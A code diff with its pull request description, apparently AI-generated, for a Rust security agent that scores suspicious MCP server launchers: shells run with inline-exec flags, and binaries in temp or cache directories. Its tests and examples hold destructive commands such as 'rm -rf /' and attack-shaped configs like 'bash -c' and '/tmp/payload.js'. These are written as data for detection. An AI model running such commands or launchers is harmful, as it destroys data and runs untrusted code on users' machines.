+            r"C:\Users\u\AppData\Local\Temp\x.exe", r"C:\Windows\Temp\x.exe",
+            r"C:\Temp\x.exe", r"D:\tmp\x.exe",
+            r"%TEMP%\x.exe", r"%TMP%\x", "$TMPDIR/x", "${TMPDIR}/x",
+            r"$env:TEMP\x", r"%LOCALAPPDATA%\Temp\x",
+            "~/.cache/x/payload", "/Users/u/.cache/x",
+            "/Users/u/Library/Caches/x", "~/Library/Caches/x",
+        ] {
+            assert!(is_transient_path(s), "{s} should be transient");
+        }
+    }
+
+    #[test]
+    fn transient_path_negative_list() {
+        for s in [
+            "npx", "bun", "uv", "node", "python3.12",          // bare names
+            "/usr/bin/env", "/usr/local/bin/node",             // normal abs
+            "~/.cargo/bin/my-tool", "~/.local/bin/uvx",        // toolchain dotdirs
+            "~/.nvm/versions/node/v22/bin/node",
+            "./target/debug/my-mcp-server", "a/b",             // relative
+            "node_modules/.bin/server",                        // .bin != .cache
+            "~/tmp/x",                                         // non-standard personal temp
+            "/tmp",                                            // dir itself, no file
+            "/tmpfoo/x",                                       // segment mismatch
+        ] {
+            assert!(!is_transient_path(s), "{s} must NOT be transient");
+        }
     }
 
     #[test]

--- a/crates/sigil-agent/src/ai_guard/rubric.rs
+++ b/crates/sigil-agent/src/ai_guard/rubric.rs
@@ -34,10 +34,12 @@ fn kind_key(reason: &AiGuardReason) -> &'static str {
         AiGuardReason::TrustedMcpServer { .. } => "trusted_mcp_server",
         AiGuardReason::AutoApprovalEnabled { .. } => "auto_approval_enabled",
         AiGuardReason::McpServerSuspiciousLauncher {
-            shape: LauncherShape::Shell, ..
+            shape: LauncherShape::Shell,
+            ..
         } => "mcp_launcher_shell",
         AiGuardReason::McpServerSuspiciousLauncher {
-            shape: LauncherShape::TransientPath, ..
+            shape: LauncherShape::TransientPath,
+            ..
         } => "mcp_launcher_transient_path",
     }
 }

--- a/crates/sigil-agent/src/ai_guard/rubric.rs
+++ b/crates/sigil-agent/src/ai_guard/rubric.rs
@@ -4,7 +4,7 @@
 //! delegates to `Rubric::defaults().score()` so existing callers (tests,
 //! doctor static-fallback path) keep working unchanged.
 
-use sigil_core::event::{AiGuardBucket, AiGuardReason};
+use sigil_core::event::{AiGuardBucket, AiGuardReason, LauncherShape};
 use std::collections::{BTreeMap, HashMap, HashSet};
 use std::sync::OnceLock;
 
@@ -33,6 +33,12 @@ fn kind_key(reason: &AiGuardReason) -> &'static str {
         AiGuardReason::McpServerLocalCommand { .. } => "mcp_server_local_command",
         AiGuardReason::TrustedMcpServer { .. } => "trusted_mcp_server",
         AiGuardReason::AutoApprovalEnabled { .. } => "auto_approval_enabled",
+        AiGuardReason::McpServerSuspiciousLauncher {
+            shape: LauncherShape::Shell, ..
+        } => "mcp_launcher_shell",
+        AiGuardReason::McpServerSuspiciousLauncher {
+            shape: LauncherShape::TransientPath, ..
+        } => "mcp_launcher_transient_path",
     }
 }
 
@@ -42,7 +48,7 @@ fn kind_key(reason: &AiGuardReason) -> &'static str {
 #[derive(Debug, Clone)]
 pub struct Rubric {
     /// kind_key → weight. Keys are static strings owned by the rubric
-    /// module (returned by `kind_key()`). Defaults populate all 13 known
+    /// module (returned by `kind_key()`). Defaults populate all 15 known
     /// kinds; with_overrides() may replace values but never adds keys.
     pub weights: HashMap<&'static str, f32>,
     /// Subset of `weights` whose value came from an operator override
@@ -57,7 +63,7 @@ pub struct Rubric {
 impl Rubric {
     /// Build the canonical hardcoded weights — single source of truth for
     /// defaults. Must match the historical `weight_for()` match arms for
-    /// all 13 kinds.
+    /// all 15 kinds.
     pub fn defaults() -> Self {
         let mut w: HashMap<&'static str, f32> = HashMap::new();
         w.insert("destructive_in_inline_command", 4.0);
@@ -71,6 +77,8 @@ impl Rubric {
         w.insert("permissions_deny_empty", 1.0);
         w.insert("mcp_server_remote", 1.0);
         w.insert("mcp_server_local_command", 0.5);
+        w.insert("mcp_launcher_shell", 3.0);
+        w.insert("mcp_launcher_transient_path", 3.0);
         w.insert("trusted_mcp_server", 1.5);
         w.insert("auto_approval_enabled", 2.0);
         Rubric {
@@ -234,7 +242,8 @@ pub fn canonical_hash(reasons: &[AiGuardReason]) -> [u8; 32] {
 #[cfg(test)]
 mod tests {
     use super::*;
-    use sigil_core::event::AiGuardReason;
+    use sigil_core::event::{AiGuardReason, LauncherShape};
+    use std::collections::HashMap;
     use std::path::PathBuf;
 
     #[test]
@@ -409,7 +418,7 @@ mod tests {
     }
 
     #[test]
-    fn rubric_defaults_produces_eleven_known_weights() {
+    fn rubric_defaults_all_15_kinds_present() {
         let r = Rubric::defaults();
         assert_eq!(r.weights.get("destructive_in_inline_command"), Some(&4.0));
         assert_eq!(r.weights.get("destructive_in_hook_script"), Some(&4.0));
@@ -424,7 +433,9 @@ mod tests {
         assert_eq!(r.weights.get("mcp_server_local_command"), Some(&0.5));
         assert_eq!(r.weights.get("trusted_mcp_server"), Some(&1.5));
         assert_eq!(r.weights.get("auto_approval_enabled"), Some(&2.0));
-        assert_eq!(r.weights.len(), 13);
+        assert_eq!(r.weights.get("mcp_launcher_shell"), Some(&3.0));
+        assert_eq!(r.weights.get("mcp_launcher_transient_path"), Some(&3.0));
+        assert_eq!(r.weights.len(), 15);
     }
 
     #[test]
@@ -537,5 +548,68 @@ mod tests {
                 // Debug build: debug_assert! panicked. That's expected behavior.
             }
         }
+    }
+
+    fn launcher(shape: LauncherShape) -> AiGuardReason {
+        AiGuardReason::McpServerSuspiciousLauncher {
+            server_name: "a".into(),
+            command: "x".into(),
+            shape,
+            evidence: "e".into(),
+        }
+    }
+
+    /// #127 spec §6 — bucket boundaries for the attack-shape launcher.
+    #[test]
+    fn suspicious_launcher_buckets_match_spec_127() {
+        let base = vec![
+            AiGuardReason::McpServerLocalCommand {
+                server_name: "a".into(),
+                command: "npx".into(),
+            },
+            AiGuardReason::NoSandbox {
+                executor: "mcp_command".into(),
+            },
+        ];
+        assert_eq!(score(&base), 2.5);
+        assert_eq!(bucket(score(&base)), AiGuardBucket::Medium);
+
+        let mut high = base.clone();
+        high.push(launcher(LauncherShape::Shell));
+        assert_eq!(score(&high), 5.5);
+        assert_eq!(bucket(score(&high)), AiGuardBucket::High);
+
+        let mut crit = high.clone();
+        crit.push(AiGuardReason::TrustedMcpServer {
+            server_name: "a".into(),
+        });
+        assert_eq!(score(&crit), 7.0);
+        assert_eq!(bucket(score(&crit)), AiGuardBucket::Critical);
+
+        let mut both = high.clone();
+        both.push(launcher(LauncherShape::TransientPath));
+        assert_eq!(score(&both), 8.5);
+        assert_eq!(bucket(score(&both)), AiGuardBucket::Critical);
+
+        let mut shell_destructive = high.clone();
+        shell_destructive.push(AiGuardReason::DestructiveInInlineCommand {
+            pattern: "p".into(),
+            hook_event: "mcp_command".into(),
+            snippet: "rm -rf /".into(),
+        });
+        assert_eq!(score(&shell_destructive), 9.5);
+        assert_eq!(bucket(score(&shell_destructive)), AiGuardBucket::Critical);
+    }
+
+    /// #127 — the two shapes are independently tunable kind_keys.
+    #[test]
+    fn launcher_kind_keys_override_independently() {
+        let mut o = HashMap::new();
+        o.insert("mcp_launcher_shell".to_string(), 0.5_f32);
+        let r = Rubric::defaults().with_overrides(&o);
+        assert_eq!(r.weights.get("mcp_launcher_shell"), Some(&0.5));
+        assert_eq!(r.weights.get("mcp_launcher_transient_path"), Some(&3.0));
+        assert!(r.overridden.contains("mcp_launcher_shell"));
+        assert!(r.unknown_override_keys.is_empty());
     }
 }

--- a/crates/sigil-agent/tests/antigravity_migration_parity.rs
+++ b/crates/sigil-agent/tests/antigravity_migration_parity.rs
@@ -88,7 +88,7 @@ fn pilot_pack_deserializes_with_real_serde_shape() {
 
 use sigil_agent::ai_guard::parser::AiGuardParser;
 use sigil_agent::ai_guard::{AntigravityParser, RulePackParser};
-use sigil_core::event::AiGuardReason;
+use sigil_core::event::{AiGuardReason, LauncherShape};
 use std::path::Path;
 
 /// Rewire the pack's `~` on_file paths to `home`, so the pack reads the same
@@ -398,19 +398,31 @@ fn gap_destructive_shell_arg_is_parser_only() {
         r#"{"mcpServers":{"a":{"command":"bash","args":["-c","rm -rf /tmp/sigil-test"]}}}"#,
     );
     let d = diff(home.path());
-    // pack reproduces local_command + no_sandbox (parity), but cannot produce the
-    // destructive finding -> it is the sole parser_only reason.
+    // pack reproduces local_command + no_sandbox (parity), but cannot produce
+    // the destructive finding NOR the #127 attack-shape launcher finding ->
+    // exactly those two are parser_only.
     assert!(
         d.pack_only.is_empty(),
         "pack_only must be empty: {:?}",
         d.pack_only
     );
-    assert_eq!(d.parser_only.len(), 1, "parser_only: {:?}", d.parser_only);
-    let only: AiGuardReason = serde_json::from_str(&d.parser_only[0]).unwrap();
-    assert!(matches!(
-        only,
+    assert_eq!(d.parser_only.len(), 2, "parser_only: {:?}", d.parser_only);
+    let parsed: Vec<AiGuardReason> = d
+        .parser_only
+        .iter()
+        .map(|s| serde_json::from_str(s).unwrap())
+        .collect();
+    assert!(parsed.iter().any(|r| matches!(
+        r,
         AiGuardReason::DestructiveInInlineCommand { hook_event, .. } if hook_event == "mcp_command"
-    ));
+    )));
+    assert!(parsed.iter().any(|r| matches!(
+        r,
+        AiGuardReason::McpServerSuspiciousLauncher {
+            shape: LauncherShape::Shell,
+            ..
+        }
+    )));
 }
 
 // ---------------------------------------------------------------------------

--- a/crates/sigil-core/src/event.rs
+++ b/crates/sigil-core/src/event.rs
@@ -211,6 +211,29 @@ pub enum AiGuardReason {
     /// Phase 3b.8 — the agent's default approval mode auto-approves a class
     /// of tool calls without prompting (e.g. Gemini `defaultApprovalMode: "auto_edit"`).
     AutoApprovalEnabled { mode: String },
+    /// #127 — stdio MCP launcher matches an attack shape (shell + inline-exec
+    /// flag, or a transient/writable path in command or args). Emitted in
+    /// ADDITION to the `McpServerLocalCommand` baseline.
+    McpServerSuspiciousLauncher {
+        server_name: String,
+        /// The config's `command` string, verbatim.
+        command: String,
+        shape: LauncherShape,
+        /// Token that triggered the verdict — `"bash -c"`-style for shell,
+        /// the matched path string (command itself or one arg) for
+        /// transient_path.
+        evidence: String,
+    },
+}
+
+/// #127 — classification of a suspicious stdio MCP launcher. Stable wire
+/// strings ("shell" / "transient_path") — SIEM filter keys, renames are
+/// breaking changes.
+#[derive(Serialize, Deserialize, Debug, Clone, Copy, PartialEq, Eq)]
+#[serde(rename_all = "snake_case")]
+pub enum LauncherShape {
+    Shell,
+    TransientPath,
 }
 
 /// Persisted form of a hook observation (#64). Distinct from the IPC
@@ -1312,5 +1335,28 @@ mod tests {
         assert!(s.contains("\"decision\":\"deny\""));
         let back: Evidence = serde_json::from_str(&s).unwrap();
         assert_eq!(back, ev);
+    }
+
+    #[test]
+    fn mcp_suspicious_launcher_wire_strings_pinned() {
+        let r = AiGuardReason::McpServerSuspiciousLauncher {
+            server_name: "a".into(),
+            command: "bash".into(),
+            shape: LauncherShape::Shell,
+            evidence: "bash -c".into(),
+        };
+        let j = serde_json::to_value(&r).unwrap();
+        assert_eq!(j["kind"], "mcp_server_suspicious_launcher");
+        assert_eq!(j["shape"], "shell");
+        let back: AiGuardReason = serde_json::from_value(j).unwrap();
+        assert_eq!(back, r);
+
+        let t = AiGuardReason::McpServerSuspiciousLauncher {
+            server_name: "a".into(),
+            command: "node".into(),
+            shape: LauncherShape::TransientPath,
+            evidence: "/tmp/payload.js".into(),
+        };
+        assert_eq!(serde_json::to_value(&t).unwrap()["shape"], "transient_path");
     }
 }


### PR DESCRIPTION
## Summary

Follow-up to #125/#126 (uniform local stdio MCP command detection). Every stdio MCP server now uniformly scores `McpServerLocalCommand` (0.5) + `NoSandbox` (2.0) = **2.5 / Medium** — true for a benign `npx @modelcontextprotocol/server-foo` and for an attacker-injected `command: "/tmp/.x/payload"` or `command: "bash", args: ["-c", …]` alike. This PR scores the **launcher shape** so the malicious form rises above the benign noise floor.

New reason `McpServerSuspiciousLauncher { server_name, command, shape, evidence }` (weight **3.0** per shape), emitted from the shared `emit_one_server` so all 7 MCP-capable parsers (gemini/cursor/antigravity/claude_code/claude_desktop/continue_dev/codex) inherit it from one change.

This is the launcher shape of the 2026 zero-click MCP incident class (Windsurf CVE-2026-30615; Cursor CurXecute; the MCP-SDK interpreter-allowlist mitigation).

## Two attack shapes (not a basename allowlist)

Per the design constraint from #127, detection keys on **attack shape**, not allowlist membership (a naive "basename not in {npx,uvx,node,…}" predicate is both too noisy — `bun`/`uv`/`/usr/bin/env node`/`python3.12` flagged — and too weak — `/tmp/python3` passes).

- **`shell`** — launcher is a shell (`sh`/`bash`/`zsh`/`dash`/`ksh`/`csh`/`tcsh`/`fish`/`cmd`/`powershell`/`pwsh`) **with an inline-exec flag** (`-c`, `/c`, `-Command`, `-EncodedCommand`, `-File`, and POSIX bundled short flags like `-lc`/`-ic`). The config *is* an inline-execution vehicle. `bash server.sh` (no exec flag) stays at the Medium baseline.
- **`transient_path`** — launcher (in `command` **or** any non-flag `arg`, to catch interpreter evasion like `node /tmp/payload.js`) resolves into a temp/runtime/cache dir: `/tmp`, `/var/tmp`, `/dev/shm`, `/var/folders`, `/run/user`, Windows `…\AppData\Local\Temp`, `%TEMP%`/`$env:TEMP` literals, `~/.cache`, `Library/Caches`. Narrow positive list — general dotdirs (`~/.cargo/bin`), relative paths (`./target/debug`), and bare names stay Medium.

`env` wrappers are unwrapped (`/usr/bin/env bash -c …` assessed as `bash -c …`). Shell-name matching normalizes case + `.exe` (`BASH.EXE`, `PwSh`).

## Scoring

| Config | Score | Bucket |
|---|---|---|
| benign stdio (`npx …`), `bash server.sh` | 2.5 | Medium (unchanged) |
| shell-exec **or** transient | 5.5 | **High** |
| + `trust:true` | 7.0 | **Critical** |
| shell-exec + transient (`/tmp/.x/bash -c`) | 8.5 | Critical |
| shell-exec + destructive args (`bash -c "rm -rf …"`) | 9.5 | Critical |

Two independently operator-tunable rubric keys: `mcp_launcher_shell`, `mcp_launcher_transient_path` (both 3.0).

## Intended behavior changes (not regressions)

- `is_shell` normalization now also catches `BASH.EXE -C "rm -rf …"` style destructive args (case + `.exe`).
- `env bash -c "rm …"` destructive args now caught (env-unwrap, shared path).
- `bash -c` + destructive body: 6.5 High → **9.5 Critical** (launcher shape stacks on the existing destructive reason).

## Tests

- Detection-helper units: positive (`bash -lc`, `/tmp/python3`, `~/.cache/x`, `%TEMP%\x`, `node /tmp/x.js`, env-unwrap, dual-shape) + negative (`npx`, `bun`, `uv`, `/usr/bin/env node`, `python3.12`, `~/.cargo/bin/x`, `./target/debug/x`, `--cache-dir=/tmp/x`).
- Rubric bucket-boundary pins (2.5 / 5.5 / 7.0 / 8.5 / 9.5) + independent override.
- Wire serde round-trip (kind/shape/evidence strings pinned).
- #102 parity test updated: the `bash -c "rm…"` fixture now produces **2** parser-only reasons (destructive + launcher); both DSL-inexpressible.
- Full workspace green (fmt + clippy `-D warnings` + test).

## Out of scope

Operator allowlists (tune via rubric override), rule-pack DSL emission (imperative kernel primitive), MCP `env` exfil / args-injection, relative-path shape, enforce/blocking.

## Consumer note

Adds a new tagged-enum wire kind (`mcp_server_suspicious_launcher`) + `LauncherShape` (`shell`/`transient_path`). A sigil-manager sync issue (incl. unknown-kind tolerance recommendation) will be filed on merge.

Fixes #127

🤖 Generated with [Claude Code](https://claude.com/claude-code)
